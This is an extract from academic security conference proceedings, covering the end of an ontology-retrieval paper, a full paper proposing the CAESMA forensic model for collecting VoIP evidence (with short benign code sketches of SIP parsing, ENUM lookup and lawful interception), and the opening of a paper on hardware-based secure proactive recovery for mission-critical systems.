systems for intelligent retrieval.<br />
Our main conclusion is that the use of logic-based ontologies has the potential to be of enormous<br />
benefit in systems demanding true intelligent retrieval. However, it has to be taken into account that<br />
this is an emerging technology that will still require a substantial amount of research in order to reach<br />
maturity. The good news is that it is possible to approach matters in an incremental fashion,<br />
developing an information repository based on more traditional methods, and gradually increasing its<br />
sophistication.<br />
References<br />
Protégé (2009) The Protégé Ontology Editor. Available: http://protege.stanford.edu/. [2009, January].<br />
Baader, F., Calvanese, D., McGuinness, D., Nardi, D. & Patel-Schneider, P. (2003) The Description Logic<br />
Handbook: Theory, Implementation, and Applications, Cambridge University Press.<br />
Baader, F., Lutz, C., Milicic, M., Sattler, U. & Wolter, F. (2005) "Integrating Description Logics and Action<br />
Formalisms: First results", AAAI 05.<br />
Ben-Ari, M. (2008) Mathematical Logic for Computer Science, Springer.<br />
Berners-Lee, T., Hendler, J. & Lassila, O. (2001), "The semantic web", Scientific American, Vol. 284, No. 5.<br />
Brown, L. (1993) The New Shorter Oxford English Dictionary on Historical Principles, Vol. 1, Oxford University<br />
Press.<br />
Buitelaar, P. & Cimiano, P. (2008) "Ontology Learning and Population: Bridging the Gap Between Text and<br />
Knowledge", Frontiers in Artificial Intelligence and Applications, Vol. 167.<br />
Buitelaar, P. & Magnini, B. (2005) "Ontology Learning From Text: Methods, Evaluation and Applications",<br />
Frontiers in Artificial Intelligence and Applications, Vol. 123.<br />
Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Poggi, A. & Rosati, R. (2006) "Linking Data to<br />
Ontologies: The Description Logic DL-LiteA", The 2nd Workshop on OWL.<br />
Calvanese, D., Giacomo, G.D., Lembo, D., Lenzerini, M. & Rosati, R. (2007) "Tractable Reasoning and Efficient<br />
Query Answering in Description Logics: The DL-Lite Family.", Journal of Automated Reasoning, Vol. 39, No.<br />
3.<br />
Catarci, T., Dongilli, P., Mascio, T.D., Franconi, E., Santucci, G. & Tessaris, S. (2004) "An Ontology Based Visual<br />
Tool for Query Formulation Support", ECAI 2004.<br />
Ceri, S., Gottlob, G. & Tanca, L. (1989) "What you always wanted to know about Datalog (and never dared to<br />
ask.)", IEEE Transactions on Knowledge and Data Engineering, Vol. 1, No. 1.<br />
Elsenbroich C., Kutz O. & Sattler, U. (2007) "A Case for Abductive Reasoning over Ontologies", OWLED.<br />
Fellbaum, C. (1998) WordNet: An Electronic Lexical Database, MIT Press.<br />
Gray, J. & Reuter, A. (1992), Transaction Processing: Concepts and Techniques, Morgan Kaufmann Publishers.<br />
Grüber, T. (1993) "A translation approach to portable ontology specifications", Knowledge Acquisition, Vol. 5.<br />
Hahn, U. & Schulz, S. (2007) "Ontological foundations for biomedical sciences", Artificial Intelligence in Medicine,<br />
Vol. 39, No. 3.<br />
Hart, G., Dolbear, C. & Johnson, M. (2008) "Rabbit: Developing a Control Natural Language for Authoring<br />
Ontologies", 5th European Semantic Web Conference.<br />
Horrocks, I. (1997) Optimising Tableaux Decision Procedures for Description Logics, University of Manchester.<br />
Horrocks, M., Drummond, N., Goodwin, J., Rector, A., Stevens, R. & Wang, H. (2006) "The Manchester OWL<br />
Syntax", OWL Experiences and Directions Workshop.<br />
Kalyanpur, A., Parsia, B., Sirin, E., Cuenca-Grau, B. & Hendler, J. (2006) "Swoop: A Web Ontology Editing<br />
Browser", Journal of Web Semantics, Vol. 4, No. 2.<br />
Kroenke, D.M. (1997) Database Processing: Fundamentals, Design, and Implementation, Prentice-Hall.<br />
Lee, K., Meyer, T., Pan, J.Z. & Booth, R. (2006) "Finding Maximally Satisfiable Terminologies for the Description<br />
Logic ALC", Proceedings of AAAI 06.<br />
Lloyd, J.W. (1987) Foundations of logic programming, Springer-Verlag, New York.<br />
McCrohan, K.F. (1998) "Competitive Intelligence: Preparing for the Information War", Long Range Planning, Vol.<br />
31, No. 4.<br />
Rodriguez-Muro, M., Lubyte, L. & Calvanese, D. (2008) "Realizing Ontology Based Data Access: A Plug-in for<br />
Protégé", ICDE Workshops.<br />
Schwitter, R., Cregan, A. & Meyer, T. (2007) "Sydney OWL Syntax - towards a Controlled Natural Language<br />
Syntax for OWL 1.1.", OWL Experiences and Directions, Third International Workshop.<br />
Sirin, E., Parsia, B., Grau, B.C., Kalyanpur, A. & Katz, Y. (2007) "Pellet: A practical OWL-DL reasoner", Journal of<br />
Web Semantics, Vol. 5, No. 2.<br />
Spivack, N. (2007). Available:<br />
http://novaspivack.typepad.com/nova_spivacks_weblog/2007/03/beyond_keyword_.html. [2010, November].<br />
Staab, S. & Studer, R. (eds) (2004) Handbook on Ontologies, Springer.<br />
Suntisrivaraporn, B., Baader, F., Schulz, S. & Spackman, K. (2007) "Replacing SEP-Triplets in SNOMED CT<br />
using Tractable Description Logic Operators", AIME.<br />
Williams, M. & Hunter, A. (2007) "Harnessing ontologies for argument-based decision-making in breast cancer",<br />
International Conference for Tools with Artificial Intelligence.<br />
Wolstencroft, K., Brass, A., Horrocks, I., Lord, P., Sattler, U., Stevens, R. & Turi, D. (2005) "A little semantic web<br />
goes a long way in biology", International Semantic Web Conference.<br />
CAESMA – An On-Going Proposal of a Network Forensic<br />
Model for VoIP traffic<br />
Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza, and Oscar Nuñez Mori<br />
Pontificia Universidad Catolica del Peru, Lima, Peru<br />
jlmasyrubi@pucp.edu.pe<br />
delcarpio.christian@pucp.edu.pe<br />
jmespino@pucp.edu.pe<br />
oscar.nunez@pucp.pe<br />
Abstract: In the near future, service convergence will be a reality, which raises the possibility that these<br />
technologies will be misused. One of these services is Voice over IP (VoIP), which provides the phone<br />
communication services in this scheme. Currently VoIP is a very popular technology, and it could be used by<br />
malicious attackers to commit computer crimes and perform illicit actions that are difficult to trace<br />
because of the nature of IP networks. Our approach is therefore to carry out a preliminary analysis towards a<br />
forensic model for the detection and tracing of VoIP traffic, which will allow adequate evidence<br />
collection that could be used by the police authorities.<br />
Keywords: network forensics, forensic model proposal, voice over IP<br />
1. Introduction<br />
Due to the inadequate use of the telephone service in converged networks, mainly caused by<br />
malicious attackers who misuse this technology, it becomes necessary to identify the security gaps in<br />
such networks and provide a possible solution.<br />
Therefore, prior to the development of this article we analysed the security gaps (Annex 1), and<br />
based on that analysis we identified “user identification for calls originating from the Internet (VoIP)”<br />
as a potential security problem, due to the lack of user data validation in the registration process<br />
when this source is used.<br />
This problem hinders proper evidence collection by the authorities, and as a result these acts often<br />
go unpunished because the attackers cannot be identified.<br />
This document proposes a preliminary data collection model for subsequent forensic analysis in a<br />
VoIP network environment for calls generated from the Internet, based on the network architecture<br />
shown in Figure 1. For our analysis, we rely on the Digital Forensics Research Workshop<br />
(DFRWS) model, which is a general model for proper digital forensic analysis.<br />
Figure 1: Network architecture<br />
160
Jose Mas y Rubi et al.<br />
As we can see within the network architecture, the originating point of the calls for our analysis will be<br />
the Internet cloud; the establishment path and signaling are as follows:<br />
a. Connection to the SIP server, which contains the database of all the users in the VoIP network.<br />
b. After the validation of the destination user, which is part of the VoIP network, the SIP server sends<br />
the corresponding signaling for call establishment with the VoIP network.<br />
The rest of the article is organized as follows: In section II we introduce the background to our work,<br />
which provides a clear basis regarding the DFRWS general analysis model and the technology<br />
behind the VoIP service. In section III we describe the CALEA and REN-JIN models, offering the<br />
theoretical basis and techniques needed to better understand the proposal of this work. In<br />
section IV we develop a comparative analysis between CALEA and REN-JIN models, taking into<br />
account the DFRWS general model as study base for both of them. In section V we propose a new<br />
forensic model which is the result of the previous analysis, and we study its preliminary architecture<br />
and basic operation. Finally we present our conclusions and possible future works.<br />
2. Theoretical basis<br />
To start our investigation, it is necessary to study the DFRWS general model for forensic<br />
analysis and the technical concepts of VoIP technology, in order to contextualize<br />
our analysis in a suitable environment.<br />
2.1 Digital Forensics Research Workshop (DFRWS) model<br />
Several forensic investigators have analyzed multiple digital forensic models. Within those models,<br />
they found that the DFRWS model is rigid and linear but is particularly suitable where necessary<br />
investigative activities are well-understood (Ray 2007). Also, they highlight the fact that in the<br />
development of this model, for the first time, academic entities were involved, which had not happened<br />
with other forensic models at the time. The other models were focused more on guidelines established<br />
by law enforcement (Reith 2002).<br />
Therefore, we chose the DFRWS model because it allows a comprehensive approach and is more<br />
closely aligned with the objectives of this academic article. Below we show the sequence of steps<br />
followed by this model for an adequate forensic analysis:<br />
Table 1: Steps for a digital forensic analysis (DFRWS 2001)<br />
2.2 Voice over IP (VoIP)<br />
The important point to keep in mind about VoIP technology concerns the information shared<br />
between the terminal devices and the data itself, which enables us to discriminate calls and<br />
their types. Those elements are presented in the following list (Pelaez 2010):<br />
a) Terminal device information:<br />
Numbers called.<br />
Source and destination IP addresses.<br />
IP geographical localization.<br />
Incoming calls.<br />
Start/end times and duration.<br />
Voice mail access numbers.<br />
Call forwarding numbers.<br />
Incoming/outgoing messages.<br />
Access codes for voice mail systems.<br />
Contact lists.<br />
b) VoIP data:<br />
Protocol type.<br />
Configuration data.<br />
Raw packets.<br />
Inter-arrival times.<br />
Variance of inter-arrival times.<br />
Payload size.<br />
Port numbers.<br />
Codecs.<br />
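Two of the listed VoIP data elements, inter-arrival times and their variance, can be computed directly from packet capture timestamps. A small sketch, with invented timestamps:

```python
from statistics import mean, pvariance

def interarrival_stats(timestamps):
    """Inter-arrival times and their variance for a packet stream, two
    of the VoIP data elements listed above."""
    gaps = [round(b - a, 6) for a, b in zip(timestamps, timestamps[1:])]
    return gaps, mean(gaps), pvariance(gaps)

ts = [0.00, 0.02, 0.04, 0.09]  # hypothetical capture times in seconds
gaps, avg, var = interarrival_stats(ts)
print(gaps)  # [0.02, 0.02, 0.05]
```

Regular gaps suggest a steady codec frame rate, while a spike in the variance can flag jitter or traffic shaping worth examining.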
The Session Initiation Protocol (SIP) is an important part of the VoIP network communication. SIP is<br />
an IETF standard for IP multimedia conferences. SIP is an application layer control protocol used to<br />
create, modify and terminate sessions with one or more participants. These sessions include internet<br />
multimedia conferences, internet phone calls and multimedia distribution. The signaling allows the<br />
transportation of call information across the network boundaries. The session management provides<br />
the ability to control the attributes of an end-to-end call (Fernandez 2007).<br />
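Since SIP signaling carries much of the call information a forensic collector would record, a minimal header parser illustrates the kind of data available. The INVITE message below is a hypothetical, abridged example:

```python
def parse_sip_headers(message):
    """Extract the request line and headers from a raw SIP message; the
    From/To/Call-ID fields are among the signaling data a forensic
    collector would record."""
    lines = message.split("\r\n")
    headers = {}
    for line in lines[1:]:          # lines[0] is the request line
        if not line:
            break                   # a blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers

# A hypothetical (abridged) INVITE for illustration only.
raw = ("INVITE sip:bob@example.org SIP/2.0\r\n"
       "From: <sip:alice@example.net>;tag=1928\r\n"
       "To: <sip:bob@example.org>\r\n"
       "Call-ID: a84b4c76e66710\r\n"
       "\r\n")
request_line, hdrs = parse_sip_headers(raw)
print(hdrs["Call-ID"])  # a84b4c76e66710
```

A production collector would of course use a full RFC 3261 parser, but even this sketch shows that caller, callee and call identifier travel in cleartext signaling unless the channel is encrypted.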
3. Related works<br />
In our preliminary investigation, we searched different models that could adapt to the DFRWS general<br />
model, and among the most outstanding models we found REN-JIN and CALEA, which are<br />
described in the following subsections.<br />
3.1 CALEA model<br />
Government surveillance is a special case of network forensics. Communications Assistance for Law<br />
Enforcement Act (CALEA) is another term used for this electronic surveillance. It means that it is<br />
legally valid to introduce an agent inside a communication channel to intercept information without<br />
altering it (Scoggins 2004).<br />
The wiretap installation is based on the cable modem’s MAC address, so it can be used for data<br />
or digital voice connections. This feature is controlled through the cable intercept command<br />
interface, which requires a MAC address, an IP address and a UDP port number as its parameters<br />
(Scoggins 2004).<br />
When it is active, the router examines each packet for the target MAC addresses and, when it finds a<br />
match to one of those addresses (either at the origin or the destination terminal device), a copy is<br />
sent to the server at the specified IP address and port number (Scoggins 2004).<br />
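This match-and-copy behavior can be sketched as a simple filter; the MAC addresses, server address and packet representation below are invented for illustration:

```python
def mirror(packets, target_macs):
    """CALEA-style interception sketch: copy every packet whose source
    or destination MAC matches a target, recording where the copy is
    to be delivered."""
    server = ("10.0.0.5", 6000)  # hypothetical collection server (IP, UDP port)
    return [(pkt, server) for pkt in packets
            if pkt["src_mac"] in target_macs or pkt["dst_mac"] in target_macs]

packets = [
    {"src_mac": "aa:aa", "dst_mac": "bb:bb", "payload": b"..."},
    {"src_mac": "cc:cc", "dst_mac": "dd:dd", "payload": b"..."},
]
copies = mirror(packets, {"aa:aa"})
print(len(copies))  # 1
```

The original packets are forwarded unchanged; only the copies go to the collection server, which is what keeps the intercept transparent to the subscriber.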
Figure 2 shows how the components of CALEA model (Delivery Function, Collection Function and<br />
Law Enforcement Agency) integrate with a VoIP system providing a transparent lawful interception.<br />
Calls are routed through an access gateway that hides any intercepts in place (Pelaez 2007).<br />
Figure 2: CALEA forensic model (Pelaez 2007)<br />
Jose Mas y Rubi et al.<br />
Telephone interception can be classified into two categories:<br />
Call detail: the details of calls sent and received by a subscriber, which are passed to the LEA. The call<br />
records generated from signaling messages can be very valuable in criminal investigations. A<br />
signaling message contains data about phone calls, not the content of the conversation;<br />
therefore, the collection and analysis of signaling messages may not be subject to the same legal<br />
restrictions as recording voice conversations (Moore 2005).<br />
Call content: the actual content of the call, which is passed to the LEA. The suspect must not detect the<br />
mirror, so this element must be produced inside the network and not on the subscriber link. The<br />
mirror must also not be detectable through any change in timing, availability characteristics or operation<br />
(Pelaez 2007).<br />
So that the LEA can take advantage of the call content without the subscriber noticing any change,<br />
all calls must pass through a device that duplicates the content and then passes it to the agency<br />
(Pelaez 2007).<br />
3.2 REN–JIN model<br />
This model, conceived by Wei Ren and Hai Jin, is designed to capture network traffic and to<br />
record the corresponding data. This network forensic system has four elements (Pelaez 2006):<br />
Network Forensics Server, which integrates and analyzes the forensic data. It also guides the<br />
packet filtering and capture behavior of the Network Monitor, and can request the<br />
activation of an investigation program in the Network Investigator as a response to a sensitive<br />
attack.<br />
Network Forensics Agents, which are responsible for data collection, data extraction and secure data<br />
transport. These agents are distributed around the network and the monitored hosts.<br />
Network Monitor, a packet and network traffic capture machine.<br />
Network Investigator, the network surveillance machine. It investigates a target when the server<br />
gives the command, and activates a real-time response program for each network intrusion.<br />
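As a rough illustration of how the four elements interact, the following toy sketch models the control flow described above. All class and method names here are our own invention, not part of the REN-JIN design.<br />

```python
class NetworkMonitor:
    """Packet and network traffic capture machine."""
    def capture(self, traffic):
        return list(traffic)

class NetworkForensicsAgent:
    """Collects, extracts and securely transports forensic data."""
    def collect(self, packets):
        return {"evidence": packets}

class NetworkInvestigator:
    """Surveillance machine; investigates a target on the server's command."""
    def investigate(self, target):
        return f"real-time response activated for {target}"

class NetworkForensicsServer:
    """Integrates and analyzes forensic data; guides the other three elements."""
    def __init__(self, monitor, agent, investigator):
        self.monitor, self.agent, self.investigator = monitor, agent, investigator

    def handle(self, traffic, sensitive_source=None):
        data = self.agent.collect(self.monitor.capture(traffic))
        if sensitive_source is not None:   # sensitive attack: activate the investigator
            data["response"] = self.investigator.investigate(sensitive_source)
        return data
```

In this toy flow the server drives capture and collection and, on a sensitive attack, activates the investigator, mirroring the division of responsibilities in the list above.<br />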
Network forensic systems and Honeynet systems share the same data collection function for system<br />
misuse. A Honeynet system lures attackers and gains information about new types of intrusions, while a<br />
network forensic system analyzes and reconstructs attack behavior. Integrating both<br />
systems helps to create an active self-learning and response system that captures intrusion<br />
behavior and investigates the original source of an attack (Pelaez 2006).<br />
Figure 3: REN-JIN forensic model (Pelaez 2006)<br />
Honeynets are a highly controlled type of network architecture, one in which all the<br />
activity that occurs can be monitored. By placing real victims (which can be any type of system, service or<br />
information) inside the network as an attack target, an environment is created in which everything<br />
that happens can be observed, allowing attacking intruders to interact with the Honeynet while information<br />
about the attack is collected. This is possible because Honeynets are high-interaction real networks<br />
that implement traps to detect, divert or, in some cases, counteract unauthorized uses of the<br />
information system, and on which no service or traffic is otherwise generated. Therefore, any interaction with<br />
the Honeynet implies malicious or unauthorized activity: any connection initiated to a Honeynet implies<br />
that someone has compromised a system and has initiated a suspicious activity. This makes the<br />
analysis of activity much easier, because all the captured information can be assumed to be unauthorized or<br />
malicious (Honeynet 2006).<br />
4. Comparative analysis<br />
One of the objectives of our work is to discuss the structure of the REN-JIN and CALEA models so that,<br />
in the end, we can state whether one of these models is applicable to forensic analysis of VoIP<br />
traffic, and also propose possible improvements to the model selected in this analysis.<br />
The methodology is to analyze the aforementioned models within the structure of the DFRWS general<br />
model, to identify whether the functions of each individual model’s elements meet the<br />
requirements of the chosen general model.<br />
In short, the elements that make up the CALEA and REN-JIN forensic models are placed in<br />
the corresponding steps of the DFRWS model structure, to identify whether the functions those elements<br />
provide cover each of the general model’s main steps.<br />
4.1 Discussion and analysis<br />
Table 2 shows the main functions of each of the analyzed models, compared with the functions of the<br />
general model:<br />
4.2 REN-JIN and CALEA operation differences<br />
The main functions of CALEA are focused on a single component, the LEA, which depends on the<br />
traffic mirror used by the forensic agents to collect the required information. This makes the model<br />
easily adaptable to the rules governing lawful interception in the countries where these types of tools<br />
are used. However, it is the duty of each country to lay down rules for the use of this type of system,<br />
so that the collected evidence has full legal validity in the judicial environment.<br />
Table 2: Comparative analysis between REN-JIN and CALEA models<br />
In contrast, the main functions of REN-JIN are distributed among different components of the model,<br />
mainly controlled by the Network Forensics Server, which has autonomous power to<br />
determine what type of traffic should be captured and analyzed. This allows the tool to collect evidence<br />
in sequential steps, obtaining more precise and adequate information with regard to the<br />
requirements of the judicial entities.<br />
Due to the characteristics of the CALEA model, forensic investigators must have freedom of action over<br />
the analyzed networks. However, because those networks can be public, there is a potential risk that<br />
interceptions could involve innocent users, violating their privacy rights.<br />
REN-JIN, like the CALEA model, requires that forensic investigators have freedom of action over the<br />
analyzed network. However, the traffic to be analyzed is channeled to a Honeynet used by the model,<br />
preserving the privacy rights of all users who are not involved in the investigation.<br />
CALEA can be considered reactive in its operation: forensic investigators<br />
must first identify the suspect, and only then implement the analysis and capture platform<br />
proposed by the model.<br />
REN-JIN is also reactive, but instead of identifying the suspect beforehand,<br />
the attacked network must be identified, which then becomes the decoy network<br />
(Honeynet) on which the model’s analysis and capture platform is based.<br />
4.3 Model selection<br />
Based on our analysis, and after weighing the advantages and limitations of the two<br />
studied models, we observed that the REN-JIN model has the more adequate architecture, possessing the<br />
majority of the functions of the DFRWS general model; once its limitations are overcome, this<br />
model can be validated as a network forensic model. Also, while REN-JIN is a theoretical model, we<br />
believe that it could be properly implemented.<br />
4.4 Improvements in the chosen model<br />
Having chosen the REN-JIN model, we observed that it presents several flaws, which we<br />
propose to correct through the insertion of new elements that strengthen the<br />
architecture for a sound VoIP forensic analysis.<br />
The identification function could be implemented in a converged network through technologies such as the<br />
MEGACO/H.248 protocol (ITU 2005) and ENUM (IETF 2004).<br />
The preservation function could be complemented with the deployment of a backup system, such as<br />
incremental backups and mirrored system backups.<br />
The presentation function would be implemented with a reporting mechanism containing the basic<br />
parameters needed for an adequate legal analysis, so that reports can be used as proof and<br />
possibly validated as evidence. By modifying the REN-JIN model and introducing these new elements,<br />
a new forensic model is obtained, which we call the CAESMA model.<br />
5. Proposition of CAESMA model<br />
This proposal is part of an ongoing investigation; in the following subsections we present a preliminary<br />
architecture and its basic operation.<br />
5.1 Presentation of the new architecture<br />
To clarify the information flow between the elements that form this network architecture, we<br />
present the following basic diagram:<br />
Figure 4: Proposed network architecture<br />
Inserting an IP Multimedia Subsystem (IMS) module allows us to integrate various<br />
existing communication service platforms. Likewise, an ENUM module allows us to link an<br />
identification number to a system user, bearing in mind that each user may have several<br />
means of communication previously integrated into IMS. For this user identification proposal to be<br />
viable, each of the services offered by the service provider must have an appropriate<br />
registration in ENUM. For example:<br />
Figure 5: ENUM operation<br />
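As a concrete illustration of the registration and lookup just described: ENUM (RFC 3761) maps an E.164-style number to a DNS domain by reversing its digits, separating them with dots and appending the suffix e164.arpa; a DNS NAPTR query on that domain then returns the URIs of the services registered for the user. The sketch below uses the example number from this paper; real deployments use full E.164 numbers.<br />

```python
def enum_domain(number: str) -> str:
    """Build the ENUM (RFC 3761) lookup domain for a telephone number."""
    digits = [c for c in number if c.isdigit()]   # drop '+' and separators
    return ".".join(reversed(digits)) + ".e164.arpa"

print(enum_domain("4981791"))  # → 1.9.7.1.8.9.4.e164.arpa
```

The NAPTR records found at that name would list, for example, a SIP URI and a mail URI for the same user, which is how one identification number covers several IMS-integrated services.<br />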
Another pending point of improvement is the preservation function, which can be strengthened<br />
through data duplication techniques such as RAID disk structures or redundant servers; this<br />
modification must be implemented specifically in the Network Forensics Server, which can send the<br />
backup data to a medium as described above, once the data has been analyzed.<br />
The purpose of the presentation function is to generate reports that will be<br />
presented to the competent authorities; this requires specialized personnel who<br />
can adequately identify the proofs and validate them as possible evidence. For this purpose, we<br />
consider that an element that can fulfill this function is the Law Enforcement Agency (LEA), which is<br />
a fundamental part of the CALEA model. Some of the basic parameters to be considered would be<br />
the ones presented in section II under the VoIP topic.<br />
5.2 Proposed network basic operation<br />
The operation of the network architecture and the states relevant to our analysis are described in the<br />
following lines:<br />
1) A call is generated from the Internet; the caller wants to communicate with some user on the network,<br />
for which it uses a number, for example, 4981791.<br />
2) Once the Gateway receives the internet user’s communication request, it interacts with the<br />
IMS core, which in turn interacts with ENUM and returns the user identification of<br />
the called number, according to SIP signaling.<br />
3) The CAESMA network intercepts the IMS core response and identifies the user, affected by<br />
the criminal acts, who is being contacted.<br />
4) CAESMA connects the capture network and starts the real-time forensic process.<br />
5) The called user answers and the communication proceeds normally.<br />
6) When the communication is finished, the forensic process of collecting proofs also<br />
ends.<br />
Figure 6: Relevant states in CAESMA network operation<br />
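The six steps above can be sketched as a simple sequence. This is a toy model under our own naming, not the real CAESMA components of Figures 4 and 6:<br />

```python
def caesma_call(number, watched_numbers, enum_table):
    """Walk through the six operational states for one incoming call."""
    log = []
    user = enum_table[number]               # 2) IMS core resolves the number via ENUM
    watched = number in watched_numbers     # 3) CAESMA inspects the intercepted response
    if watched:
        log.append(f"capture started for {user}")   # 4) real-time forensic process begins
    log.append(f"call with {user} in progress")     # 5) communication proceeds normally
    if watched:
        log.append("capture finished")              # 6) evidence collection ends with the call
    return log

events = caesma_call("4981791", {"4981791"}, {"4981791": "user-a"})
```

Calls to numbers that are not under investigation pass through with no capture events, which reflects the privacy-preserving behavior claimed for the model.<br />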
6. Conclusions<br />
The current trend of widespread use of VoIP communications makes it indispensable for forensic<br />
investigators to have the necessary tools to study and prevent all possible vulnerability<br />
threats in these communications.<br />
According to the investigation made in this paper, the tools possibly applicable to this problem<br />
are the REN-JIN model and the CALEA model. Both were conceived as network forensic models and<br />
are not fully adequate for evidence collection in VoIP communications, which involves special<br />
evidence parameters that network forensic investigators must identify and capture as<br />
specific data about the crime.<br />
In this sense, the new CAESMA model is proposed, which appears to cover the shortcomings noted<br />
in the forensic models mentioned above, meeting all the steps necessary for a proper VoIP forensic<br />
analysis, as established in the DFRWS general model.<br />
In conclusion, the CAESMA model offers a robust network forensic system for the identification,<br />
preservation, collection, examination, analysis and presentation of information concerning<br />
VoIP traffic, which ultimately will provide validated evidence for adequate use by judicial<br />
authorities.<br />
7. Future works<br />
Based on the comparative analysis completed in this work and the preliminary presentation of the<br />
CAESMA model, the next step in our work is to develop this new forensic model and to validate it<br />
for adequate VoIP network analysis.<br />
8. Annex 1<br />
Problem tree<br />
Objectives tree<br />
Acknowledgements<br />
To Juan C. Pelaez of the U.S. Army Research Laboratory, USA, for his collaboration and for supplying us<br />
with updated work material.<br />
To Juergen Rochol and Liane M. Rockenbach Tarouco of UFRGS, RS-Brazil, for their state-of-the-art<br />
documentation.<br />
References<br />
DFRWS: Digital Forensics Research Workshop. (2001) "A Road Map for Digital Forensics Research 2001”.<br />
Digital Forensics Research Workshop 6 November. http://www.dfrws.org/2001/dfrws-rm-final.pdf<br />
IETF: Internet Engineering Task Force. (2004) “RFC 3761: The E.164 to URI DDDS Application (ENUM)”,<br />
http://www.ietf.org/rfc/rfc3761.txt<br />
ITU: International Telecommunication Union, (2005) “Recommendation H.248.1”, http://www.itu.int/rec/T-REC-<br />
H.248.1-200509-I/en<br />
Fernandez, Eduardo; Pelaez, Juan and Larrondo-Petrie, Maria. (2007) “Security patterns for Voice over IP<br />
Networks”, Journal of Software, Vol. 2, No. 2, August.<br />
Moore, T.; Meehan, A.; Manes, G. and Shenoi, S. (2005) “Using Signaling Information in Telecom Network<br />
forensics”. Advances in Digital Forensics: IFIP International <strong>Conference</strong> on Digital Forensics, National<br />
Center for Forensic Science, Orlando, Florida, USA.<br />
Pelaez, Juan and Fernandez, Eduardo. (2006) “Wireless VOIP Network Forensics”, Fourth LACCEI International<br />
Latin American and Caribbean <strong>Conference</strong> for Engineering and Technology (LACCET’2006), Mayaguez,<br />
Puerto Rico.<br />
Pelaez, Juan; Fernandez, Eduardo; Larrondo-Petrie, Maria and Wieser, Christian. (2007) “Attack Patterns in<br />
VoIP”, Florida Atlantic University, USA. University of Oulu, Finland.<br />
Pelaez, Juan and Fernandez, Eduardo. (2010) “VoIP Network Forensic Patterns”, U.S. Army Research<br />
Laboratory, USA. Florida Atlantic University, USA.<br />
Ray, Daniel and Bradford, Phillip. (2007) “Models of Models: Digital Forensics and Domain-Specific Languages”,<br />
Department of Computer Science, The University of Alabama, USA.<br />
Reith, Mark; Carr, Clint and Gunsch, Gregg. (2002) “An Examination of Digital Forensic Models”, International<br />
Journal of Digital Evidence, Fall, Volume 1, Issue 3.<br />
Scoggins, Sophia. (2004) “Security Challenges for CALEA in Voice over Packet Networks”. Texas Instruments,<br />
April 16, USA.<br />
The Honeynet Project. (2006) “Know Your Enemy: Honeynets”, http://www.honeynet.org<br />
Secure Proactive Recovery – a Hardware Based Mission<br />
Assurance Scheme<br />
Ruchika Mehresh 1 , Shambhu Upadhyaya 1 and Kevin Kwiat 2<br />
1 State University of New York at Buffalo, USA<br />
2 Air Force Research Laboratory, Rome, USA<br />
rmehresh@buffalo.edu<br />
shambhu@buffalo.edu<br />
kwiatk@rl.af.mil<br />
Abstract: Mission Assurance in critical systems entails both fault tolerance and security. Since fault tolerance via<br />
redundancy or replication is contradictory to the notion of a limited trusted computing base, normal security<br />
techniques cannot be applied to fault tolerant systems. Thus, in order to enhance the dependability of mission<br />
critical systems, designers employ a multi-phase approach that includes fault/threat avoidance/prevention,<br />
detection and recovery. The detection phase is the fallback plan for the avoidance/prevention phase, just as<br />
the recovery phase is the fallback plan for the detection phase. However, despite this three-stage barrier, a determined adversary can<br />
still defeat system security by staging an attack on the recovery phase. Recovery being the final stage of the<br />
dependability life-cycle, unless certain security methodologies are used, full assurance to mission critical<br />
operations cannot be guaranteed. For this reason, we propose a new methodology, viz. secure proactive<br />
recovery that can be built into future mission-critical systems in order to secure the recovery phase at low cost.<br />
The solution proposed is realized through a hardware-supported design of a consensus protocol. One of the<br />
major strengths of this scheme is that it not only detects abnormal behavior due to system faults or attacks, but<br />
also secures the system in cases where a smart attacker attempts to camouflage himself by playing along with the<br />
predefined protocols. This sort of adversary may compromise certain system nodes at some earlier stage but<br />
remain dormant until the critical phase of the mission is reached. We call such an adversary The Quiet Invader.<br />
In an effort to minimize overhead, enhance performance and tamper-proof our scheme, we employ redundant<br />
hardware typically found in today’s self-testing processor ICs, like design for testability (DFT) and built-in self-test<br />
(BIST) logic. The cost and performance analysis presented in this paper validates the feasibility and efficiency of<br />
our solution.<br />
Keywords: security, fault tolerance, mission assurance, critical systems, hardware<br />
1. Introduction<br />
Research in the past several decades has seen significant maturity in the field of fault tolerance. But,<br />
fault tolerant systems still require multi-phased security due to the lack of a strong trusted computing<br />
base. The first phase in this regard is avoidance/prevention, which consists of proactive measures to<br />
reduce the probability of any faults or attacks. This can be achieved via advanced design<br />
methodologies like encryption. The second phase, detection, consisting primarily of an intrusion<br />
detection system, attempts to detect the faults and malicious attacks that occur despite the preventive<br />
measures. The final phase, recovery, focuses on recuperating the system after the<br />
occurrence of attack/fault. Generally, fault tolerant systems rely on replication and redundancy for<br />
fault-masking and system recovery.<br />
These three layers of security provide a strong defense for mission critical systems. Yet, if a<br />
determined adversary stages an attack on the recovery phase of an application, it is quite possible<br />
that the mission will fail due to the lack of any further countermeasures. Therefore, these systems<br />
need the provisioning of another layer of defense to address attacks that may be brought about by<br />
malicious opponents during the recovery phase itself.<br />
The quiet invader is another serious threat that we consider. Attacking the mission in its critical phase<br />
not only leaves the defender with less time to respond, but cancelling the mission at this late stage is<br />
far more expensive than cancelling it at some earlier stage. In the case where the defender is not left<br />
with enough time to respond to the attack, it can lead to major economic loss and even fatalities.<br />
We develop a framework for mission assured recovery using the concept of runtime node-to-node<br />
verification implementable at low-level hardware that is not accessible by the adversary. The rationale<br />
behind this approach is that if an adversary can compromise a node by gaining root privilege to user-space<br />
components, any solution developed in the user space will not be effective, since such solutions<br />
may not remain secure and tamper-resistant. In our scheme, the entire verification process can be<br />
carried out in a manner that is oblivious to the adversary, which gains the system an additional<br />
Ruchika Mehresh et al.<br />
advantage. We explore the potential of utilizing the test logic on the processors (and hence the name<br />
“hardware-based mission assurance scheme”) for implementing our secure proactive recovery<br />
paradigm. This choice makes our solution extremely cost-effective. In order to establish the proof-of-concept<br />
for this proposal, we will consider a simple mission-critical system architecture that uses<br />
majority consensus for diagnosis and recovery. Finally, we analyze the security, usability and<br />
performance overhead for this scheme.<br />
2. Related work<br />
The solutions proposed in the literature to address faults/attacks in fault tolerant systems are<br />
designed to employ redundancy, replication and consensus protocols. They are able to tolerate the<br />
failure of up to f replicas. However, given enough time and resources, an attacker can compromise<br />
more than f replicas and subvert the system. A combination of reactive and proactive recovery<br />
approaches can be used to keep the number of compromised replicas under f at all times (Sousa et<br />
